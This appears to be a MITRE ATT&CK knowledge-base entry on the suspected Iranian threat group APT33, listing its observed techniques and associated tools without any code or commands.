APT33

APT33 is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors. [1] [2]

ID: G0064
Associated Groups: Elfin
Version: 1.2

Associated Group Descriptions

Name Description
Elfin [4]

Techniques Used

Domain ID Name Use
Enterprise T1110 Brute Force APT33 has used password spraying to gain access to target systems.[3]
Enterprise T1043 Commonly Used Port APT33 has used port 443 for command and control.[3]
Enterprise T1003 Credential Dumping APT33 has used a variety of publicly available tools like LaZagne, Mimikatz, Gpppassword, SniffPass, and ProcDump to dump credentials.[4][3]
Enterprise T1002 Data Compressed APT33 has used WinRAR to compress data prior to exfil. [4]
Enterprise T1132 Data Encoding APT33 has used base64 to encode command and control traffic.[3]
Enterprise T1480 Execution Guardrails APT33 has used kill dates in their malware to guardrail execution.[3]
Enterprise T1048 Exfiltration Over Alternative Protocol APT33 has used FTP to exfiltrate files (separately from the C2 channel).[4]
Enterprise T1203 Exploitation for Client Execution APT33 has attempted to exploit a known vulnerability in WinRAR (CVE-2018-20250).[4]
Enterprise T1068 Exploitation for Privilege Escalation APT33 has used a publicly available exploit for CVE-2017-0213 to escalate privileges on a local system.[3]
Enterprise T1040 Network Sniffing APT33 has used SniffPass to collect credentials by sniffing network traffic.[4]
Enterprise T1027 Obfuscated Files or Information APT33 has used base64 to encode payloads.[3]
Enterprise T1086 PowerShell APT33 has utilized PowerShell to download files from the C2 server and run various scripts.[4]
Enterprise T1060 Registry Run Keys / Startup Folder APT33 has deployed a tool known as DarkComet to the Startup folder of a victim.[4]
Enterprise T1105 Remote File Copy APT33 has downloaded additional files and programs from its C2 server. [4]
Enterprise T1053 Scheduled Task APT33 has created a scheduled task to execute a .vbe file multiple times a day.[4]
Enterprise T1192 Spearphishing Link APT33 has sent spearphishing emails containing links to .hta files.[1][4]
Enterprise T1071 Standard Application Layer Protocol APT33 has used HTTP for command and control.[4]
Enterprise T1032 Standard Cryptographic Protocol APT33 has used AES for encryption of command and control traffic.[3]
Enterprise T1065 Uncommonly Used Port APT33 has used ports 808 and 880 for command and control.[4]
Enterprise T1204 User Execution APT33 has lured users to click links to malicious HTML applications delivered via spearphishing emails.[1][4]
Enterprise T1078 Valid Accounts APT33 has used valid accounts for initial access and privilege escalation.[2][3]

Software

ID Name References Techniques
S0129 AutoIt backdoor [4] Bypass User Account Control, Data Encoding, File and Directory Discovery, PowerShell
S0363 Empire [3] [4] Access Token Manipulation, Accessibility Features, Account Discovery, Browser Bookmark Discovery, Bypass User Account Control, Clipboard Data, Command-Line Interface, Commonly Used Port, Create Account, Credential Dumping, Credentials in Files, Data Compressed, Distributed Component Object Model, DLL Search Order Hijacking, Domain Trust Discovery, Email Collection, Execution through API, Exfiltration Over Alternative Protocol, Exfiltration Over Command and Control Channel, Exploitation for Privilege Escalation, Exploitation of Remote Services, File and Directory Discovery, Group Policy Modification, Hooking, Input Capture, Kerberoasting, LLMNR/NBT-NS Poisoning and Relay, Modify Existing Service, Network Service Scanning, Network Share Discovery, Network Sniffing, Obfuscated Files or Information, Pass the Hash, Pass the Ticket, Path Interception, PowerShell, Private Keys, Process Discovery, Process Injection, Registry Run Keys / Startup Folder, Remote File Copy, Remote Services, Scheduled Task, Screen Capture, Scripting, Security Software Discovery, Security Support Provider, Service Execution, Shortcut Modification, SID-History Injection, Standard Application Layer Protocol, Standard Cryptographic Protocol, System Information Discovery, System Network Configuration Discovery, System Network Connections Discovery, Timestomp, Trusted Developer Utilities, Video Capture, Web Service, Windows Management Instrumentation
S0095 FTP [4] Commonly Used Port, Exfiltration Over Alternative Protocol
S0349 LaZagne [4] Credential Dumping, Credentials in Files
S0002 Mimikatz [4] Account Manipulation, Credential Dumping, Credentials in Files, DCShadow, Pass the Hash, Pass the Ticket, Private Keys, Security Support Provider, SID-History Injection
S0336 NanoCore [2] Audio Capture, Command-Line Interface, Disabling Security Tools, Input Capture, Modify Registry, Obfuscated Files or Information, Registry Run Keys / Startup Folder, Remote File Copy, Scripting, Standard Cryptographic Protocol, System Network Configuration Discovery, Uncommonly Used Port, Video Capture
S0039 Net [4] Account Discovery, Create Account, Network Share Connection Removal, Network Share Discovery, Password Policy Discovery, Permission Groups Discovery, Remote System Discovery, Service Execution, System Network Connections Discovery, System Service Discovery, System Time Discovery, Windows Admin Shares
S0198 NETWIRE [1] [2] Code Signing, Input Capture, Registry Run Keys / Startup Folder, Screen Capture, System Information Discovery
S0378 PoshC2 [3] [4] Access Token Manipulation, Account Discovery, Automated Collection, Brute Force, Bypass User Account Control, Connection Proxy, Credential Dumping, Credentials in Files, Data Compressed, Domain Trust Discovery, Exploitation for Privilege Escalation, Exploitation of Remote Services, File and Directory Discovery, Input Capture, LLMNR/NBT-NS Poisoning and Relay, Network Service Scanning, Network Sniffing, Pass the Hash, Password Policy Discovery, Permission Groups Discovery, Process Injection, Service Execution, Standard Application Layer Protocol, System Information Discovery, System Network Configuration Discovery, System Network Connections Discovery, System Service Discovery, Windows Management Instrumentation, Windows Management Instrumentation Event Subscription
S0194 PowerSploit [3] Access Token Manipulation, Account Discovery, Audio Capture, Credential Dumping, Credentials in Registry, Data from Local System, DLL Search Order Hijacking, Domain Trust Discovery, Indicator Removal from Tools, Input Capture, Kerberoasting, Modify Existing Service, Obfuscated Files or Information, Path Interception, PowerShell, Process Discovery, Process Injection, Query Registry, Registry Run Keys / Startup Folder, Scheduled Task, Screen Capture, Security Support Provider, Windows Management Instrumentation
S0371 POWERTON [3] Commonly Used Port, Credential Dumping, PowerShell, Registry Run Keys / Startup Folder, Standard Application Layer Protocol, Standard Cryptographic Protocol, Windows Management Instrumentation Event Subscription
S0192 Pupy [3] Access Token Manipulation, Account Discovery, Audio Capture, Bypass User Account Control, Create Account, Credential Dumping, Data Compressed, Email Collection, Exfiltration Over Command and Control Channel, File and Directory Discovery, Indicator Removal on Host, Input Capture, LLMNR/NBT-NS Poisoning and Relay, Multilayer Encryption, Network Service Scanning, Network Share Discovery, PowerShell, Process Discovery, Process Injection, Registry Run Keys / Startup Folder, Remote Desktop Protocol, Remote File Copy, Screen Capture, Scripting, Service Execution, Standard Application Layer Protocol, Standard Cryptographic Protocol, System Information Discovery, System Network Configuration Discovery, System Network Connections Discovery, System Owner/User Discovery, Systemd Service, Video Capture, Virtualization/Sandbox Evasion
S0358 Ruler [3] Email Collection, Office Application Startup
S0140 Shamoon [4] Bypass User Account Control, Commonly Used Port, Data Destruction, Data Encrypted for Impact, Disk Structure Wipe, Masquerading, Modify Registry, New Service, Obfuscated Files or Information, Query Registry, Remote File Copy, Remote System Discovery, Scheduled Task, Service Execution, Standard Application Layer Protocol, System Information Discovery, System Network Configuration Discovery, System Time Discovery, Valid Accounts, Windows Admin Shares
S0380 StoneDrill [1] Data Destruction, Disk Content Wipe, Disk Structure Wipe, File Deletion, Obfuscated Files or Information, Process Injection, Query Registry, Remote File Copy, Screen Capture, Scripting, Security Software Discovery, System Information Discovery, System Time Discovery, Virtualization/Sandbox Evasion, Windows Management Instrumentation
S0199 TURNEDUP [1] [2] [4] Command-Line Interface, Process Injection, Registry Run Keys / Startup Folder, Remote File Copy, Screen Capture, System Information Discovery

References